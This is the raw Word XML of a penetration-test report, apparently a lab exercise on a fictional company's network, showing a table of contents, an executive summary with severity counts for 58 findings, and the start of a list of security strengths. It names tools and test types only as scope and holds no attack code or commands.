            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46B698AB" w14:textId="003C76A8" w:rsidR="00704167" w:rsidRDefault="47DF796B" w:rsidP="47DF796B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
              <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc364109528">
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>ASSESSMENT FINDINGS</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:instrText>PAGEREF _Toc364109528 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="660BA332" w14:textId="62BBC70B" w:rsidR="00704167" w:rsidRDefault="47DF796B" w:rsidP="47DF796B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
              <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc1994268691">
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>FORENSIC EVIDENCE COLLECTION AND ANALYSIS</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:instrText>PAGEREF _Toc1994268691 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6780B584" w14:textId="33E93BE2" w:rsidR="00704167" w:rsidRDefault="47DF796B" w:rsidP="47DF796B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
              <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc1718906709">
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>APPENDIX A - TOOLS USED</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:instrText>PAGEREF _Toc1718906709 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FC06890" w14:textId="2A894DA6" w:rsidR="00704167" w:rsidRPr="009A5FA4" w:rsidRDefault="47DF796B" w:rsidP="47DF796B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
              <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc250359503">
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>APPENDIX B - ENGAGEMENT INFORMATION</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:instrText>PAGEREF _Toc250359503 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23782D76" w14:textId="046554AF" w:rsidR="00704167" w:rsidRPr="009A5FA4" w:rsidRDefault="47DF796B" w:rsidP="47DF796B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
              <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc419992788">
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Client Information</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:instrText>PAGEREF _Toc419992788 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5474D6D7" w14:textId="7878E01D" w:rsidR="00704167" w:rsidRPr="009A5FA4" w:rsidRDefault="47DF796B" w:rsidP="47DF796B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:rStyle w:val="Hyperlink"/>
              <w:noProof/>
              <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc595845494">
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Version Information</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:instrText>PAGEREF _Toc595845494 \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="00C62CCC">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="705D4C66" w14:textId="20195939" w:rsidR="00054322" w:rsidRPr="00553FC1" w:rsidRDefault="47DF796B" w:rsidP="00553FC1">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
            </w:tabs>
            <w:rPr>
              <w:color w:val="0000FF" w:themeColor="hyperlink"/>
              <w:u w:val="single"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc1556393393">
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Contact Information</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>PAGEREF _Toc1556393393 \h</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="47DF796B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:bookmarkStart w:id="0" w:name="_n20bhnm5z36" w:displacedByCustomXml="prev"/>
    <w:bookmarkEnd w:id="0" w:displacedByCustomXml="prev"/>
    <w:bookmarkStart w:id="1" w:name="_rdo1tubjt7va" w:displacedByCustomXml="prev"/>
    <w:bookmarkEnd w:id="1" w:displacedByCustomXml="prev"/>
    <w:bookmarkStart w:id="2" w:name="_Toc1867082780" w:displacedByCustomXml="prev"/>
    <w:p w14:paraId="0F280F49" w14:textId="078091B0" w:rsidR="00A768D8" w:rsidRDefault="00A768D8" w:rsidP="00A768D8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>EXECUTIVE SUMMARY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="11CEBC25" w14:textId="3A974572" w:rsidR="002D0065" w:rsidRDefault="002D0065" w:rsidP="006E244D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D20896">
        <w:t xml:space="preserve">I performed a comprehensive security assessment of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D20896">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechShield’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D20896">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> corporate network</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20896">
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidRPr="007359D8">
        <w:t>15 September 2025.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D20896">
        <w:t xml:space="preserve"> This penetration test simulated an attack from an external threat actor attempting to gain access to systems within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D20896">
        <w:t>TechShield’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D20896">
        <w:t xml:space="preserve"> environment. The assessment was designed to identify vulnerabilities across the infrastructure and provide actionable remediation steps to mitigate risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4BBBEF" w14:textId="77777777" w:rsidR="002D0065" w:rsidRPr="00D20896" w:rsidRDefault="002D0065" w:rsidP="002D0065"/>
    <w:p w14:paraId="7E889DF4" w14:textId="77777777" w:rsidR="002D0065" w:rsidRDefault="002D0065" w:rsidP="00D14935">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0026646E">
        <w:t>The scope included network vulnerability scanning (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0026646E">
        <w:t>Netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0026646E">
        <w:t xml:space="preserve">, Nmap, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0026646E">
        <w:t>Greenbone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0026646E">
        <w:t>/OpenVAS), web application testing (DVWA: SQLi, XSS, file upload, payload injection), password security testing (Hydra), and digital forensics (Autopsy for hash verification and hidden file recovery).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D09140" w14:textId="77777777" w:rsidR="00D14935" w:rsidRPr="0026646E" w:rsidRDefault="00D14935" w:rsidP="002D0065"/>
    <w:p w14:paraId="5626594F" w14:textId="183CFDC0" w:rsidR="002D0065" w:rsidRDefault="002D0065" w:rsidP="002D0065">
      <w:r w:rsidRPr="0026646E">
        <w:t>A total of 58 vulnerabilities were identified, categorized as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722FC398" w14:textId="77777777" w:rsidR="002D0065" w:rsidRPr="0026646E" w:rsidRDefault="002D0065" w:rsidP="002D0065"/>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768D8" w14:paraId="349DA5B2" w14:textId="77777777" w:rsidTr="008A21E0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340"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tcPr>
          <w:p w14:paraId="2D242072" w14:textId="77777777" w:rsidR="00A768D8" w:rsidRDefault="00A768D8" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="980000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5DFD7FAB" w14:textId="77777777" w:rsidR="00A768D8" w:rsidRDefault="00A768D8" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1C232"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="61179D2F" w14:textId="77777777" w:rsidR="00A768D8" w:rsidRDefault="00A768D8" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="38761D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61F5FAA6" w14:textId="77777777" w:rsidR="00A768D8" w:rsidRDefault="00A768D8" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A768D8" w14:paraId="5C7EFE5A" w14:textId="77777777" w:rsidTr="008A21E0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1EEA6D04" w14:textId="490DB955" w:rsidR="00A768D8" w:rsidRDefault="003622EA" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2264F3A5" w14:textId="118DD97D" w:rsidR="00A768D8" w:rsidRDefault="003622EA" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="15E3B578" w14:textId="35CDD9C5" w:rsidR="00A768D8" w:rsidRDefault="003622EA" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2340" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5BB57CBB" w14:textId="633B6245" w:rsidR="00A768D8" w:rsidRDefault="003622EA" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EF0BC88" w14:textId="77777777" w:rsidR="00A768D8" w:rsidRDefault="00A768D8" w:rsidP="00A768D8"/>
    <w:p w14:paraId="1FE5F827" w14:textId="77777777" w:rsidR="0041753F" w:rsidRDefault="0041753F" w:rsidP="00785BE8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0041753F">
        <w:t>The most severe findings include outdated software, insecure configurations, and weak authentication mechanisms. These weaknesses could allow attackers to gain unauthorized access, escalate privileges, disrupt operations, and expose sensitive client data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAEDB8B" w14:textId="77777777" w:rsidR="00785BE8" w:rsidRPr="0041753F" w:rsidRDefault="00785BE8" w:rsidP="00785BE8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="546DB7E0" w14:textId="77777777" w:rsidR="0041753F" w:rsidRPr="0041753F" w:rsidRDefault="0041753F" w:rsidP="00785BE8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0041753F">
        <w:t xml:space="preserve">To mitigate these risks, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0041753F">
        <w:t>TechShield</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0041753F">
        <w:t xml:space="preserve"> should prioritize remediation of High severity vulnerabilities, enforce strong security policies, and implement regular patching and monitoring to reduce future exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DE5CAA" w14:textId="5DA6741B" w:rsidR="00A768D8" w:rsidRDefault="00A768D8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6534B869" w14:textId="32937720" w:rsidR="009D0A37" w:rsidRDefault="009D0A37" w:rsidP="00A768D8"/>
    <w:p w14:paraId="5E4DDE70" w14:textId="6C5B6A64" w:rsidR="009D0A37" w:rsidRDefault="009D0A37" w:rsidP="00A768D8"/>
    <w:p w14:paraId="0A0D7A43" w14:textId="4218209A" w:rsidR="009D0A37" w:rsidRDefault="009D0A37" w:rsidP="00A768D8"/>
    <w:p w14:paraId="32A779A1" w14:textId="5DF1EC7B" w:rsidR="009D0A37" w:rsidRDefault="009D0A37" w:rsidP="00A768D8"/>
    <w:p w14:paraId="0BB2C1FC" w14:textId="77777777" w:rsidR="009D0A37" w:rsidRDefault="009D0A37" w:rsidP="009D0A37">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc65263686"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>HIGH LEVEL ASSESSMENT OVERVIEW</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="63C8A089" w14:textId="77777777" w:rsidR="009D0A37" w:rsidRDefault="009D0A37" w:rsidP="009D0A37">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc198618583"/>
      <w:r>
        <w:t>Observed Security Strengths</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="095141AF" w14:textId="2C15870F" w:rsidR="00C309CB" w:rsidRPr="00C309CB" w:rsidRDefault="00C309CB" w:rsidP="00C309CB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C309CB">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">I identified the following strengths in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C309CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>TechShield’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C309CB">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> network which improve overall security. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C309CB">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>TechShield</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C309CB">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> should continue to monitor these controls to ensure they remain effective:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5191B2" w14:textId="77777777" w:rsidR="00C309CB" w:rsidRPr="00C309CB" w:rsidRDefault="00C309CB" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C309CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Network Segmentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00C309CB">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>: Systems were isolated in a lab network (192.168.57.x range), limiting uncontrolled exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4F1935" w14:textId="77777777" w:rsidR="00C309CB" w:rsidRPr="00C309CB" w:rsidRDefault="00C309CB" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C309CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Credentialed Scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="00C309CB">
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>: Victim-Laptop was scanned with valid credentials, enabling deeper insight into patch and configuration status.</w:t>
      </w:r>
    </w:p>
